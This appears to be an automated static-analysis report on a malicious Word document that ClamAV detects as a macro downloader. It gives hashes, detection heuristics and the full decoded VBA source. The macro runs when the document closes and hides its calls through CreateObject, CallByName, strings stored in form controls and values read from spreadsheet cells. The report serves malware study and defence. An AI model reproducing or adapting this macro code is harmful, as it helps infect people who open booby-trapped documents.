Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 39605e9f51e6ec5f…

MALICIOUS

Office (OOXML)

Size: 82.4 KB
Created: 2021-01-29 08:30:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-02-19
MD5: dd5acab95bb325e665700fdf590c7b67
SHA-1: 2c6267e978708be982347136dc7e98d9925564b3
SHA-256: 39605e9f51e6ec5fb4914b117adc23f2103a10f5949451db08702d52d75c5ad1
Risk score: 222

Heuristics (5)

  • ClamAV: Doc.Downloader.Valyria-10033915-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set n4 = CreateObject(UserForm1.qk & UserForm1.bz)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Set E = CallByName(n4.Workbooks, UserForm1.ez & UserForm1.pb, 1, UserForm2.ComboBox1, , , , UserForm1.ak)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 7003 bytes
SHA-256: 66e2c4223cd521f450169b46d43708c5d07cd4378c4f66327fb980d95082d9f1
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Public no, kf, ce, c9, si, n4, m9, qv, p6, hix, k9, mv, nzz, ke, n3, bb

Sub Document_Close()
    h6
End Sub

Sub h6()
    On Error Resume Next
    UserForm2.ComboBox1.ListIndex = 5
    kt = UserForm2.ComboBox13
    Set n4 = CreateObject(UserForm1.qk & UserForm1.bz)
    n4.DisplayAlerts = False
    ljw = 1301
    cn = 0
    Err.Number = 0
    While ljw <> 0 And cn < 32
        Set E = CallByName(n4.Workbooks, UserForm1.ez & UserForm1.pb, 1, UserForm2.ComboBox1, , , , UserForm1.ak)
        ljw = Err.Number
        cn = cn + 16
    Wend
    If ljw <> 0 Then
ErrHandler:
        na8 = CallByName(Application, UserForm1.eb & UserForm1.qf, 2)
        If na8 <> False Then
            or4 = UserForm2.ComboBox6
            Set kr = CreateObject(UserForm1.ik & UserForm1.f3)
            CallByName kr.Documents, UserForm1.ez & UserForm1.pb, 1, ActiveDocument.FullName, , True
            CallByName kr, UserForm1.h9 & UserForm1.rlq, 1, Now + TimeSerial(0, 0, 2), UserForm1.i4 & UserForm1.l1 & "h6"
        Else
            jh = UserForm2.ComboBox8
            CallByName Application, UserForm1.h9 & UserForm1.rlq, 1, Now + TimeSerial(0, 0, 17), UserForm1.i4 & UserForm1.l1 & "h6"
        End If
        n4.Quit
        Exit Sub
    End If
    Dim c7
    Set c7 = n4.sheets(1)
    god = UserForm2.ComboBox15
    vv = "'"
    bb = n4.sheets(5).Cells(1, 1)
    If Len(bb) < 1 Then
        If n4.ActiveWorkbook.Title <> "Google" Then
            GoTo ErrHandler
        Else
            cd = UserForm2.ComboBox3
            Exit Sub
        End If
    End If
    t1 = n4.sheets(1).Cells(49, 27).Value
    r2 = c7.Cells(99, 20).Value
    hix = n4.sheets(1).Cells(93, 60).Value
    k9 = n4.sheets(2).Cells(134, 44).Value
    si = n4.sheets(2).Cells(113, 7).Value
    q0 = n4.sheets(2).Cells(78, 9).Value
    dq = n4.sheets(1).Cells(80, 30).Value
    ga = UserForm2.ComboBox9
    v1y = n4.sheets(3).Cells(52, 45).Value
    jp = n4.sheets(2).Cells(11, 2).Value
    o9 = n4.sheets(1).Cells(29, 52).Value
    nzz = n4.sheets(2).Cells(126, 10).Value
    m9 = c7.Cells(124, 1).Value
    p6 = n4.sheets(3).Cells(24, 6).Value
    p9 = n4.sheets(3).Cells(74, 12).Value
    hi = n4.sheets(2).Cells(44, 36).Value
    jv = UserForm2.ComboBox5
    mv = c7.Cells(53, 50).Value
    tc9 = n4.sheets(1).Cells(149, 47).Value
    ug = n4.sheets(2).Cells(51, 53).Value
    no = n4.sheets(3).Cells(131, 27).Value
    di2 = n4.sheets(3).Cells(143, 51).Value
    h8 = c7.Cells(116, 32).Value
    j67 = UserForm2.ComboBox12
    qv = n4.sheets(3).Cells(112, 29).Value
    kf = n4.sheets(3).Cells(134, 8).Value
    gs = n4.sheets(3).Cells(131, 46).Value
    r4 = UserForm2.ComboBox21
    pl = n4.sheets(2).Cells(58, 24).Value
    rk3 = UserForm2.ComboBox5
    n3 = ""
    Set Sh1 = n4.sheets(4)
    jf = 1
    k5 = True
    While k5
        lc = Sh1.Cells(jf, 1).Value
        If Len(lc) < 1 Then
            k5 = False
        Else
            n3 = n3 & lc
        End If
        jf = jf + 1
    Wend
    d6 = CallByName(n4, o9, 2)
    UserForm1.pk9.Value = dq & d6 & ug
    UserForm1.bk.Value = r2
    CallByName CreateObject(pl), h8, 1, UserForm1.pk9, tc9, UserForm1.bk
    Set o4 = CreateObject(t1)
    ig = UserForm2.ComboBox19
    Set ac = CallByName(o4, q0, 2)
    Set r1 = CallByName(ac, gs, 1)
    Set p6 = CallByName(o4, p6, 2)
    Set c9 = o4
    h7 = UserForm2.ComboBox17
    UserForm5.ComboBox1 = "o1"
    Set no = CallByName(ke, no, 2)
    qv = CallByName(no, qv, 2)
    UserForm1.lx.Value = di2 & v1y
    UserForm3.ComboBox1 = jp
    fy = UserForm2.ComboBox13
    UserForm1.lx.Value = p9
    UserForm4.ComboBox1 = UserForm3.ComboBox1
    UserForm3.ComboBox1 = qv
    o4 = fm
    E = k3
    duq = UserForm2.ComboBox12
    c7 = c3
    ac = hm
    r1 = et
    p6 = ek
    hix = jr
    j84 = UserForm2.ComboBox9
    k9 = hz
    ke = dv
    no = fkt
    c2k = UserForm2.ComboBox27
    c9 = n7
    DoEvents
    CallByName n4, hi, 1
    e8 = UserForm2.ComboBox26
    n4 = uj
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C80ED98B-F814-4187-8274-0F9E8E1BEC6D}{D573506A-15DC-4A19-BDC2-289AC28A48B6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{7F2874F9-FFFD-4B3D-9F74-0B433096FF5A}{F2E480F2-E86F-45CA-B15F-FAB9CF9EDF24}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
    vj = UserForm2.ComboBox10
    hv = UserForm2.Controls.Count - 1
    bd = UserForm2.ComboBox23
    mx = UserForm2.ComboBox18
    dy = ""
    For mu7 = 1 To hv Step 2
        dy = dy & UserForm2.Controls.Item(mu7)
    Next
    hs = UserForm2.ComboBox7
    ComboBox1.AddItem "f8"
    b7 = UserForm2.ComboBox5
    ComboBox1.AddItem "zg"
    ComboBox1.AddItem "ei"
    ComboBox1.AddItem "ed"
    ComboBox1.AddItem "i3"
    ComboBox1.AddItem dy
    ComboBox1.AddItem "gz"
    ro = UserForm2.ComboBox22
    p0 = UserForm2.ComboBox6
End Sub

Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{26CFAB0F-445A-48D4-A1AB-73861D6FA525}{82CB858B-FD75-432E-B12A-44763EAC3EBD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
    CallByName ActiveDocument.no, ActiveDocument.m9, VbMethod, 1, ActiveDocument.qv
    CallByName ActiveDocument.no, ActiveDocument.kf, VbMethod, UserForm1.lx.Value
End Sub

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{615C4FC4-A62E-44E5-A2F0-2D83C21282C9}{1EF39E8A-4508-497E-96D0-6B752228C4EA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
    CallByName ActiveDocument.c9, ActiveDocument.si, VbMethod, UserForm1.lx.Value, ActiveDocument.n3, ActiveDocument.bb
End Sub

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{5CE4AFA8-8333-47D0-A4EA-7D133B805A8C}{BE2A8477-15A3-4171-984C-64AF0E672AA4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
    Set ActiveDocument.hix = CallByName(ActiveDocument.p6, ActiveDocument.hix, VbGet)
    Set ActiveDocument.k9 = CallByName(ActiveDocument.hix, ActiveDocument.k9, VbGet)
    Set ActiveDocument.ke = CallByName(ActiveDocument.k9, ActiveDocument.mv, VbMethod, ActiveDocument.nzz)
End Sub

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 51200 bytes
SHA-256: 7c26191f361eb97cb16447f11420a8dd572d3c8abe3c687b60e3a40f3cbf8750
Detection
ClamAV: Doc.Downloader.Valyria-10033915-0
Obfuscation or payload: unlikely